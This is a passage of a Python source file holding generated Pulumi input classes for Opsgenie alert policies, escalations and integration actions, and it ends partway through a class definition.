'ServiceIncidentRuleIncidentRuleIncidentPropertyArgs',
'ServiceIncidentRuleIncidentRuleIncidentPropertyStakeholderPropertyArgs',
'TeamMemberArgs',
'TeamRoutingRuleCriteriaArgs',
'TeamRoutingRuleCriteriaConditionArgs',
'TeamRoutingRuleNotifyArgs',
'TeamRoutingRuleTimeRestrictionArgs',
'TeamRoutingRuleTimeRestrictionRestrictionArgs',
'UserUserAddressArgs',
'GetEscalationRepeatArgs',
'GetEscalationRuleArgs',
'GetEscalationRuleRecipientArgs',
'GetTeamMemberArgs',
]
@pulumi.input_type
class AlertPolicyFilterArgs:
    # Generated Pulumi input type for the alert-policy `filter` block;
    # @pulumi.input_type introspects the class, so structure must not change.
    def __init__(__self__, *,
                 conditions: Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyFilterConditionArgs']]]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[Sequence[pulumi.Input['AlertPolicyFilterConditionArgs']]] conditions: Conditions applied to filter. This is a block, structure is documented below.
        :param pulumi.Input[str] type: Type of responder. Acceptable values are: `user` or `team`
        """
        # Only store values the caller actually supplied.
        if conditions is not None:
            pulumi.set(__self__, "conditions", conditions)
        if type is not None:
            pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter
    def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyFilterConditionArgs']]]]:
        """
        Conditions applied to filter. This is a block, structure is documented below.
        """
        return pulumi.get(self, "conditions")
    @conditions.setter
    def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyFilterConditionArgs']]]]):
        pulumi.set(self, "conditions", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """
        Type of responder. Acceptable values are: `user` or `team`
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class AlertPolicyFilterConditionArgs:
    # Generated Pulumi input type for one condition inside an alert-policy
    # filter block. `field` and `operation` are required; the rest optional.
    def __init__(__self__, *,
                 field: pulumi.Input[str],
                 operation: pulumi.Input[str],
                 expected_value: Optional[pulumi.Input[str]] = None,
                 key: Optional[pulumi.Input[str]] = None,
                 not_: Optional[pulumi.Input[bool]] = None,
                 order: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[str] field: Specifies which alert field will be used in condition. Possible values are `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`
        :param pulumi.Input[str] operation: It is the operation that will be executed for the given field and key. Possible operations are `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty`, `equals-ignore-whitespace`.
        :param pulumi.Input[str] expected_value: User defined value that will be compared with alert field according to the operation. Default: empty string
        :param pulumi.Input[str] key: If `field` is set as extra-properties, key could be used for key-value pair
        :param pulumi.Input[bool] not_: Indicates behaviour of the given operation. Default: `false`
        :param pulumi.Input[int] order: Order of the condition in conditions list
        """
        pulumi.set(__self__, "field", field)
        pulumi.set(__self__, "operation", operation)
        if expected_value is not None:
            pulumi.set(__self__, "expected_value", expected_value)
        if key is not None:
            pulumi.set(__self__, "key", key)
        if not_ is not None:
            pulumi.set(__self__, "not_", not_)
        if order is not None:
            pulumi.set(__self__, "order", order)
    @property
    @pulumi.getter
    def field(self) -> pulumi.Input[str]:
        """
        Specifies which alert field will be used in condition. Possible values are `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`
        """
        return pulumi.get(self, "field")
    @field.setter
    def field(self, value: pulumi.Input[str]):
        pulumi.set(self, "field", value)
    @property
    @pulumi.getter
    def operation(self) -> pulumi.Input[str]:
        """
        It is the operation that will be executed for the given field and key. Possible operations are `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty`, `equals-ignore-whitespace`.
        """
        return pulumi.get(self, "operation")
    @operation.setter
    def operation(self, value: pulumi.Input[str]):
        pulumi.set(self, "operation", value)
    @property
    @pulumi.getter(name="expectedValue")
    def expected_value(self) -> Optional[pulumi.Input[str]]:
        """
        User defined value that will be compared with alert field according to the operation. Default: empty string
        """
        return pulumi.get(self, "expected_value")
    @expected_value.setter
    def expected_value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "expected_value", value)
    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input[str]]:
        """
        If `field` is set as extra-properties, key could be used for key-value pair
        """
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key", value)
    @property
    # Trailing underscore avoids clashing with Python's `not` keyword; the
    # wire name stays "not" via the getter's name= override.
    @pulumi.getter(name="not")
    def not_(self) -> Optional[pulumi.Input[bool]]:
        """
        Indicates behaviour of the given operation. Default: `false`
        """
        return pulumi.get(self, "not_")
    @not_.setter
    def not_(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "not_", value)
    @property
    @pulumi.getter
    def order(self) -> Optional[pulumi.Input[int]]:
        """
        Order of the condition in conditions list
        """
        return pulumi.get(self, "order")
    @order.setter
    def order(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "order", value)
@pulumi.input_type
class AlertPolicyResponderArgs:
    # Generated Pulumi input type describing a responder (user or team)
    # attached to an alert policy. `id` and `type` are required.
    def __init__(__self__, *,
                 id: pulumi.Input[str],
                 type: pulumi.Input[str],
                 name: Optional[pulumi.Input[str]] = None,
                 username: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] id: ID of the responder
        :param pulumi.Input[str] type: Type of responder. Acceptable values are: `user` or `team`
        :param pulumi.Input[str] name: Name of the responder
        :param pulumi.Input[str] username: Username of the responder
        """
        pulumi.set(__self__, "id", id)
        pulumi.set(__self__, "type", type)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if username is not None:
            pulumi.set(__self__, "username", username)
    @property
    @pulumi.getter
    def id(self) -> pulumi.Input[str]:
        """
        ID of the responder
        """
        return pulumi.get(self, "id")
    @id.setter
    def id(self, value: pulumi.Input[str]):
        pulumi.set(self, "id", value)
    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        Type of responder. Acceptable values are: `user` or `team`
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the responder
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def username(self) -> Optional[pulumi.Input[str]]:
        """
        Username of the responder
        """
        return pulumi.get(self, "username")
    @username.setter
    def username(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "username", value)
@pulumi.input_type
class AlertPolicyTimeRestrictionArgs:
    # Generated Pulumi input type for an alert-policy `time_restriction`
    # block: a restriction type plus optional day/hour restriction entries.
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 restrictions: Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyTimeRestrictionRestrictionArgs']]]] = None):
        """
        :param pulumi.Input[str] type: Type of responder. Acceptable values are: `user` or `team`
        :param pulumi.Input[Sequence[pulumi.Input['AlertPolicyTimeRestrictionRestrictionArgs']]] restrictions: List of days and hours definitions for field type = `weekday-and-time-of-day`. This is a block, structure is documented below.
        """
        pulumi.set(__self__, "type", type)
        if restrictions is not None:
            pulumi.set(__self__, "restrictions", restrictions)
    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        Type of responder. Acceptable values are: `user` or `team`
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter
    def restrictions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyTimeRestrictionRestrictionArgs']]]]:
        """
        List of days and hours definitions for field type = `weekday-and-time-of-day`. This is a block, structure is documented below.
        """
        return pulumi.get(self, "restrictions")
    @restrictions.setter
    def restrictions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyTimeRestrictionRestrictionArgs']]]]):
        pulumi.set(self, "restrictions", value)
@pulumi.input_type
class AlertPolicyTimeRestrictionRestrictionArgs:
    # Generated Pulumi input type for one day/hour window inside an
    # alert-policy time restriction; all six bounds are required.
    def __init__(__self__, *,
                 end_day: pulumi.Input[str],
                 end_hour: pulumi.Input[int],
                 end_min: pulumi.Input[int],
                 start_day: pulumi.Input[str],
                 start_hour: pulumi.Input[int],
                 start_min: pulumi.Input[int]):
        """
        :param pulumi.Input[str] end_day: Ending day of restriction (eg. `wednesday`)
        :param pulumi.Input[int] end_hour: Ending hour of restriction.
        :param pulumi.Input[int] end_min: Ending minute of restriction on defined `end_hour`
        :param pulumi.Input[str] start_day: Starting day of restriction (eg. `monday`)
        :param pulumi.Input[int] start_hour: Starting hour of restriction.
        :param pulumi.Input[int] start_min: Staring minute of restriction on defined `start_hour`
        """
        pulumi.set(__self__, "end_day", end_day)
        pulumi.set(__self__, "end_hour", end_hour)
        pulumi.set(__self__, "end_min", end_min)
        pulumi.set(__self__, "start_day", start_day)
        pulumi.set(__self__, "start_hour", start_hour)
        pulumi.set(__self__, "start_min", start_min)
    @property
    @pulumi.getter(name="endDay")
    def end_day(self) -> pulumi.Input[str]:
        """
        Ending day of restriction (eg. `wednesday`)
        """
        return pulumi.get(self, "end_day")
    @end_day.setter
    def end_day(self, value: pulumi.Input[str]):
        pulumi.set(self, "end_day", value)
    @property
    @pulumi.getter(name="endHour")
    def end_hour(self) -> pulumi.Input[int]:
        """
        Ending hour of restriction.
        """
        return pulumi.get(self, "end_hour")
    @end_hour.setter
    def end_hour(self, value: pulumi.Input[int]):
        pulumi.set(self, "end_hour", value)
    @property
    @pulumi.getter(name="endMin")
    def end_min(self) -> pulumi.Input[int]:
        """
        Ending minute of restriction on defined `end_hour`
        """
        return pulumi.get(self, "end_min")
    @end_min.setter
    def end_min(self, value: pulumi.Input[int]):
        pulumi.set(self, "end_min", value)
    @property
    @pulumi.getter(name="startDay")
    def start_day(self) -> pulumi.Input[str]:
        """
        Starting day of restriction (eg. `monday`)
        """
        return pulumi.get(self, "start_day")
    @start_day.setter
    def start_day(self, value: pulumi.Input[str]):
        pulumi.set(self, "start_day", value)
    @property
    @pulumi.getter(name="startHour")
    def start_hour(self) -> pulumi.Input[int]:
        """
        Starting hour of restriction.
        """
        return pulumi.get(self, "start_hour")
    @start_hour.setter
    def start_hour(self, value: pulumi.Input[int]):
        pulumi.set(self, "start_hour", value)
    @property
    @pulumi.getter(name="startMin")
    def start_min(self) -> pulumi.Input[int]:
        """
        Staring minute of restriction on defined `start_hour`
        """
        return pulumi.get(self, "start_min")
    @start_min.setter
    def start_min(self, value: pulumi.Input[int]):
        pulumi.set(self, "start_min", value)
@pulumi.input_type
class ApiIntegrationResponderArgs:
    # Generated Pulumi input type for an API-integration responder
    # (optional id/type pair).
    def __init__(__self__, *,
                 id: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] id: The id of the responder.
        :param pulumi.Input[str] type: The responder type.
        """
        if id is not None:
            pulumi.set(__self__, "id", id)
        if type is not None:
            pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        The id of the responder.
        """
        return pulumi.get(self, "id")
    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """
        The responder type.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class EmailIntegrationResponderArgs:
    # Generated Pulumi input type for an email-integration responder
    # (optional id/type pair).
    def __init__(__self__, *,
                 id: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] id: The id of the responder.
        :param pulumi.Input[str] type: The responder type.
        """
        if id is not None:
            pulumi.set(__self__, "id", id)
        if type is not None:
            pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        The id of the responder.
        """
        return pulumi.get(self, "id")
    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """
        The responder type.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class EscalationRepeatArgs:
    # Generated Pulumi input type for an escalation `repeat` block.
    # All fields are optional; presumably wait_interval is in minutes and
    # count is the number of repeats — TODO confirm against provider docs.
    def __init__(__self__, *,
                 close_alert_after_all: Optional[pulumi.Input[bool]] = None,
                 count: Optional[pulumi.Input[int]] = None,
                 reset_recipient_states: Optional[pulumi.Input[bool]] = None,
                 wait_interval: Optional[pulumi.Input[int]] = None):
        # Only store values the caller actually supplied.
        if close_alert_after_all is not None:
            pulumi.set(__self__, "close_alert_after_all", close_alert_after_all)
        if count is not None:
            pulumi.set(__self__, "count", count)
        if reset_recipient_states is not None:
            pulumi.set(__self__, "reset_recipient_states", reset_recipient_states)
        if wait_interval is not None:
            pulumi.set(__self__, "wait_interval", wait_interval)
    @property
    @pulumi.getter(name="closeAlertAfterAll")
    def close_alert_after_all(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "close_alert_after_all")
    @close_alert_after_all.setter
    def close_alert_after_all(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "close_alert_after_all", value)
    @property
    @pulumi.getter
    def count(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "count")
    @count.setter
    def count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "count", value)
    @property
    @pulumi.getter(name="resetRecipientStates")
    def reset_recipient_states(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "reset_recipient_states")
    @reset_recipient_states.setter
    def reset_recipient_states(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "reset_recipient_states", value)
    @property
    @pulumi.getter(name="waitInterval")
    def wait_interval(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "wait_interval")
    @wait_interval.setter
    def wait_interval(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "wait_interval", value)
@pulumi.input_type
class EscalationRuleArgs:
    # Generated Pulumi input type for a single escalation rule; all four
    # fields are required.
    def __init__(__self__, *,
                 condition: pulumi.Input[str],
                 delay: pulumi.Input[int],
                 notify_type: pulumi.Input[str],
                 recipients: pulumi.Input[Sequence[pulumi.Input['EscalationRuleRecipientArgs']]]):
        """
        :param pulumi.Input[str] condition: The condition for notifying the recipient of escalation rule that is based on the alert state. Possible values are: `if-not-acked` and `if-not-closed`. Default: `if-not-acked`
        :param pulumi.Input[int] delay: Time delay of the escalation rule, in minutes.
        :param pulumi.Input[str] notify_type: Recipient calculation logic for schedules. Possible values are:
        :param pulumi.Input[Sequence[pulumi.Input['EscalationRuleRecipientArgs']]] recipients: Object of schedule, team, or users which will be notified in escalation. The possible values for participants are: `user`, `schedule`, `team`.
        """
        pulumi.set(__self__, "condition", condition)
        pulumi.set(__self__, "delay", delay)
        pulumi.set(__self__, "notify_type", notify_type)
        pulumi.set(__self__, "recipients", recipients)
    @property
    @pulumi.getter
    def condition(self) -> pulumi.Input[str]:
        """
        The condition for notifying the recipient of escalation rule that is based on the alert state. Possible values are: `if-not-acked` and `if-not-closed`. Default: `if-not-acked`
        """
        return pulumi.get(self, "condition")
    @condition.setter
    def condition(self, value: pulumi.Input[str]):
        pulumi.set(self, "condition", value)
    @property
    @pulumi.getter
    def delay(self) -> pulumi.Input[int]:
        """
        Time delay of the escalation rule, in minutes.
        """
        return pulumi.get(self, "delay")
    @delay.setter
    def delay(self, value: pulumi.Input[int]):
        pulumi.set(self, "delay", value)
    @property
    @pulumi.getter(name="notifyType")
    def notify_type(self) -> pulumi.Input[str]:
        """
        Recipient calculation logic for schedules. Possible values are:
        """
        return pulumi.get(self, "notify_type")
    @notify_type.setter
    def notify_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "notify_type", value)
    @property
    @pulumi.getter
    def recipients(self) -> pulumi.Input[Sequence[pulumi.Input['EscalationRuleRecipientArgs']]]:
        """
        Object of schedule, team, or users which will be notified in escalation. The possible values for participants are: `user`, `schedule`, `team`.
        """
        return pulumi.get(self, "recipients")
    @recipients.setter
    def recipients(self, value: pulumi.Input[Sequence[pulumi.Input['EscalationRuleRecipientArgs']]]):
        pulumi.set(self, "recipients", value)
@pulumi.input_type
class EscalationRuleRecipientArgs:
    # Generated Pulumi input type for an escalation-rule recipient
    # (optional id/type pair).
    def __init__(__self__, *,
                 id: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] id: The ID of the Opsgenie Escalation.
        """
        if id is not None:
            pulumi.set(__self__, "id", id)
        if type is not None:
            pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Opsgenie Escalation.
        """
        return pulumi.get(self, "id")
    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)
    @property
    @pulumi.getter
    # NOTE(review): undocumented upstream; presumably one of `user`,
    # `schedule`, `team` per the EscalationRuleArgs docs — confirm.
    def type(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class IncidentTemplateStakeholderPropertyArgs:
    def __init__(__self__, *,
                 message: pulumi.Input[str],
                 description: Optional[pulumi.Input[str]] = None,
                 enable: Optional[pulumi.Input[bool]] = None):
        """
        Stakeholder-notification properties of an incident template.

        :param pulumi.Input[str] message: Message passed to the audience,
               generally used to provide content information about the alert.
        :param pulumi.Input[str] description: Detailed information about the
               alert. Must not be longer than 15000 characters.
        :param pulumi.Input[bool] enable: Option to enable stakeholder
               notifications. Default value is true.
        """
        pulumi.set(__self__, "message", message)
        # Optional arguments are only stored when explicitly supplied.
        for attr, val in (("description", description), ("enable", enable)):
            if val is not None:
                pulumi.set(__self__, attr, val)

    @property
    @pulumi.getter
    def message(self) -> pulumi.Input[str]:
        """Message passed to the audience, generally used to provide content information about the alert."""
        return pulumi.get(self, "message")

    @message.setter
    def message(self, value: pulumi.Input[str]):
        pulumi.set(self, "message", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """Detailed information about the alert. Must not be longer than 15000 characters."""
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def enable(self) -> Optional[pulumi.Input[bool]]:
        """Option to enable stakeholder notifications. Default value is true."""
        return pulumi.get(self, "enable")

    @enable.setter
    def enable(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable", value)
@pulumi.input_type
class IntegrationActionAcknowledgeArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 alias: Optional[pulumi.Input[str]] = None,
                 filters: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAcknowledgeFilterArgs']]]] = None,
                 note: Optional[pulumi.Input[str]] = None,
                 order: Optional[pulumi.Input[int]] = None,
                 type: Optional[pulumi.Input[str]] = None,
                 user: Optional[pulumi.Input[str]] = None):
        """
        An "acknowledge" action of an Opsgenie integration.

        :param pulumi.Input[str] name: Name of the integration action.
        :param pulumi.Input[str] alias: Identifier used for alert deduplication. Default: `{{alias}}`.
        :param pulumi.Input[Sequence[pulumi.Input['IntegrationActionAcknowledgeFilterArgs']]] filters: Rules for matching alerts and the filter type. The field names usable in filter conditions depend on the integration type:
               * For SNS integration: `actions`, `alias`, `entity`, `Message`, `recipients`, `responders`, `Subject`, `tags`, `teams`, `eventType`, `Timestamp`, `TopicArn`.
               * For API integration: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`, `eventType`.
               * For Email integration: `from_address`, `from_name`, `conversationSubject`, `subject`
        :param pulumi.Input[str] note: Additional alert action note.
        :param pulumi.Input[int] order: Integer value that defines in which order the action will be performed. Default: `1`.
        :param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
        :param pulumi.Input[str] user: Owner of the execution for integration action.
        """
        pulumi.set(__self__, "name", name)
        # Optional arguments are only stored when explicitly supplied.
        for attr, val in (
            ("alias", alias),
            ("filters", filters),
            ("note", note),
            ("order", order),
            ("type", type),
            ("user", user),
        ):
            if val is not None:
                pulumi.set(__self__, attr, val)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """Name of the integration action."""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def alias(self) -> Optional[pulumi.Input[str]]:
        """Identifier used for alert deduplication. Default: `{{alias}}`."""
        return pulumi.get(self, "alias")

    @alias.setter
    def alias(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "alias", value)

    @property
    @pulumi.getter
    def filters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAcknowledgeFilterArgs']]]]:
        """
        Rules for matching alerts and the filter type. The field names usable in
        the conditions depend on the integration type (SNS / API / Email) — see
        the constructor docstring for the per-type lists.
        """
        return pulumi.get(self, "filters")

    @filters.setter
    def filters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAcknowledgeFilterArgs']]]]):
        pulumi.set(self, "filters", value)

    @property
    @pulumi.getter
    def note(self) -> Optional[pulumi.Input[str]]:
        """Additional alert action note."""
        return pulumi.get(self, "note")

    @note.setter
    def note(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "note", value)

    @property
    @pulumi.getter
    def order(self) -> Optional[pulumi.Input[int]]:
        """Integer value that defines in which order the action will be performed. Default: `1`."""
        return pulumi.get(self, "order")

    @order.setter
    def order(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "order", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """The responder type - can be `escalation`, `team` or `user`."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def user(self) -> Optional[pulumi.Input[str]]:
        """Owner of the execution for integration action."""
        return pulumi.get(self, "user")

    @user.setter
    def user(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "user", value)
@pulumi.input_type
class IntegrationActionAcknowledgeFilterArgs:
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 conditions: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAcknowledgeFilterConditionArgs']]]] = None):
        """
        Alert filter attached to an "acknowledge" integration action.

        :param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
        """
        pulumi.set(__self__, "type", type)
        # `conditions` is only stored when explicitly supplied.
        if conditions is not None:
            pulumi.set(__self__, "conditions", conditions)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """The responder type - can be `escalation`, `team` or `user`."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAcknowledgeFilterConditionArgs']]]]:
        return pulumi.get(self, "conditions")

    @conditions.setter
    def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAcknowledgeFilterConditionArgs']]]]):
        pulumi.set(self, "conditions", value)
@pulumi.input_type
class IntegrationActionAcknowledgeFilterConditionArgs:
    def __init__(__self__, *,
                 field: pulumi.Input[str],
                 operation: pulumi.Input[str],
                 expected_value: Optional[pulumi.Input[str]] = None,
                 key: Optional[pulumi.Input[str]] = None,
                 not_: Optional[pulumi.Input[bool]] = None,
                 order: Optional[pulumi.Input[int]] = None):
        """
        A single condition of an "acknowledge" action's alert filter.

        :param pulumi.Input[bool] not_: Serialized to the wire name `not` (see
               the getter decorator); presumably negates the condition —
               confirm against the provider schema.
        :param pulumi.Input[int] order: Integer value that defines in which
               order the action will be performed. Default: `1`.
        """
        pulumi.set(__self__, "field", field)
        pulumi.set(__self__, "operation", operation)
        # Optional arguments are only stored when explicitly supplied.
        for attr, val in (
            ("expected_value", expected_value),
            ("key", key),
            ("not_", not_),
            ("order", order),
        ):
            if val is not None:
                pulumi.set(__self__, attr, val)

    @property
    @pulumi.getter
    def field(self) -> pulumi.Input[str]:
        return pulumi.get(self, "field")

    @field.setter
    def field(self, value: pulumi.Input[str]):
        pulumi.set(self, "field", value)

    @property
    @pulumi.getter
    def operation(self) -> pulumi.Input[str]:
        return pulumi.get(self, "operation")

    @operation.setter
    def operation(self, value: pulumi.Input[str]):
        pulumi.set(self, "operation", value)

    @property
    @pulumi.getter(name="expectedValue")
    def expected_value(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "expected_value")

    @expected_value.setter
    def expected_value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "expected_value", value)

    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter(name="not")
    def not_(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "not_")

    @not_.setter
    def not_(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "not_", value)

    @property
    @pulumi.getter
    def order(self) -> Optional[pulumi.Input[int]]:
        """Integer value that defines in which order the action will be performed. Default: `1`."""
        return pulumi.get(self, "order")

    @order.setter
    def order(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "order", value)
@pulumi.input_type
class IntegrationActionAddNoteArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 alias: Optional[pulumi.Input[str]] = None,
                 filters: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAddNoteFilterArgs']]]] = None,
                 note: Optional[pulumi.Input[str]] = None,
                 order: Optional[pulumi.Input[int]] = None,
                 type: Optional[pulumi.Input[str]] = None,
                 user: Optional[pulumi.Input[str]] = None):
        """
        An "add note" action of an Opsgenie integration.

        :param pulumi.Input[str] name: Name of the integration action.
        :param pulumi.Input[str] alias: Identifier used for alert deduplication. Default: `{{alias}}`.
        :param pulumi.Input[Sequence[pulumi.Input['IntegrationActionAddNoteFilterArgs']]] filters: Rules for matching alerts and the filter type. The field names usable in filter conditions depend on the integration type:
               * For SNS integration: `actions`, `alias`, `entity`, `Message`, `recipients`, `responders`, `Subject`, `tags`, `teams`, `eventType`, `Timestamp`, `TopicArn`.
               * For API integration: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`, `eventType`.
               * For Email integration: `from_address`, `from_name`, `conversationSubject`, `subject`
        :param pulumi.Input[str] note: Additional alert action note.
        :param pulumi.Input[int] order: Integer value that defines in which order the action will be performed. Default: `1`.
        :param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
        :param pulumi.Input[str] user: Owner of the execution for integration action.
        """
        pulumi.set(__self__, "name", name)
        # Optional arguments are only stored when explicitly supplied.
        for attr, val in (
            ("alias", alias),
            ("filters", filters),
            ("note", note),
            ("order", order),
            ("type", type),
            ("user", user),
        ):
            if val is not None:
                pulumi.set(__self__, attr, val)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """Name of the integration action."""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def alias(self) -> Optional[pulumi.Input[str]]:
        """Identifier used for alert deduplication. Default: `{{alias}}`."""
        return pulumi.get(self, "alias")

    @alias.setter
    def alias(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "alias", value)

    @property
    @pulumi.getter
    def filters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAddNoteFilterArgs']]]]:
        """
        Rules for matching alerts and the filter type. The field names usable in
        the conditions depend on the integration type (SNS / API / Email) — see
        the constructor docstring for the per-type lists.
        """
        return pulumi.get(self, "filters")

    @filters.setter
    def filters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAddNoteFilterArgs']]]]):
        pulumi.set(self, "filters", value)

    @property
    @pulumi.getter
    def note(self) -> Optional[pulumi.Input[str]]:
        """Additional alert action note."""
        return pulumi.get(self, "note")

    @note.setter
    def note(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "note", value)

    @property
    @pulumi.getter
    def order(self) -> Optional[pulumi.Input[int]]:
        """Integer value that defines in which order the action will be performed. Default: `1`."""
        return pulumi.get(self, "order")

    @order.setter
    def order(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "order", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """The responder type - can be `escalation`, `team` or `user`."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)

    @property
